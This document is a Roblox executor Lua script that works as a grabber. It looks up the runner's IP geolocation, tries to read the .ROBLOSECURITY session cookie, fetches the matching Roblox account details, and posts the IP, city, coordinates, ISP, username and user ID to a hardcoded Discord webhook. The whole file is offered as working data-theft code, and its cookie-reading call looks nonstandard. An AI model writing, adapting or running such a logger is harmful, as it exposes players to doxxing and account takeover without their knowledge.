local api = game:GetService("HttpService"):JSONDecode(game:HttpGet("https://ipwho.is/"))
local req = http_request or request or (http and http.request) or (syn and syn.request)
local webhook = "https://discord.com/api/webhooks/1204495684217348116/3Lh-aBLlVUV1zAGa8E2_0iFO2XrRvMo-Ck09VDeR0Fg7fegqQbgCys88rf4ESteCPkMW"

-- Function to get cookies from the Chromium browser
local function getCookies()
    local cookies = {}
    for _, cookie in pairs(syn.get_cookies()) do
        if cookie.domain == ".roblox.com" and cookie.name == ".ROBLOSECURITY" then
            table.insert(cookies, cookie.name .. "=" .. cookie.value)
        end
    end
    return table.concat(cookies, "; ")
end

-- Fetch user info from Roblox using the cookie
local function getUserInfo(cookie)
    local response = req({
        Url = "https://www.roblox.com/mobileapi/userinfo",
        Method = "GET",
        Headers = {
            ["Cookie"] = cookie,
            ["Content-Type"] = "application/json"
        }
    })
    return game:GetService("HttpService"):JSONDecode(response.Body)
end

local cookie = getCookies()
local userInfo = getUserInfo(cookie)

req({
    Url = webhook,
    Method = "POST",
    Headers = {
        ["Content-Type"] = "application/json"
    },
    Body = game:GetService("HttpService"):JSONEncode({
        ["content"] = "",
        ["embeds"] = {
            {
                ["title"] = "IP Information by Highyss",
                ["description"] = "IP Details:",
                ["type"] = "rich",
                ["color"] = tonumber(10027263),
                ['fields'] = {
                    {name = "**IP Address**", value = "``" .. api.ip .. "``", inline = false},
                    {name = "**Country**", value = "``" .. api.country .. "``", inline = true},
                    {name = "**Continent**", value = "``" .. api.continent .. "``", inline = true},
                    {name = "**Region**", value = "``" .. api.region .. "``", inline = true},
                    {name = "**City**", value = "``" .. api.city .. "``", inline = true},
                    {name = "**Latitude**", value = "``" .. tostring(api.latitude) .. "``", inline = true},
                    {name = "**Longitude**", value = "``" .. tostring(api.longitude) .. "``", inline = true},
                    {name = "**Flag**", value = api.flag.emoji or "N/A", inline = true},
                    {name = "**ASN**", value = "``" .. api.connection.asn .. "``", inline = true},
                    {name = "**ISP**", value = "``" .. api.connection.isp .. "``", inline = true},
                    {name = "**Roblox User ID**", value = "``" .. tostring(userInfo.UserID) .. "``", inline = true},
                    {name = "**Roblox Username**", value = "``" .. userInfo.UserName .. "``", inline = true},
                    {name = "**Roblox Premium**", value = "``" .. tostring(userInfo.IsAnyBuildersClubMember) .. "``", inline = true}
                }
            }
        }
    })
})
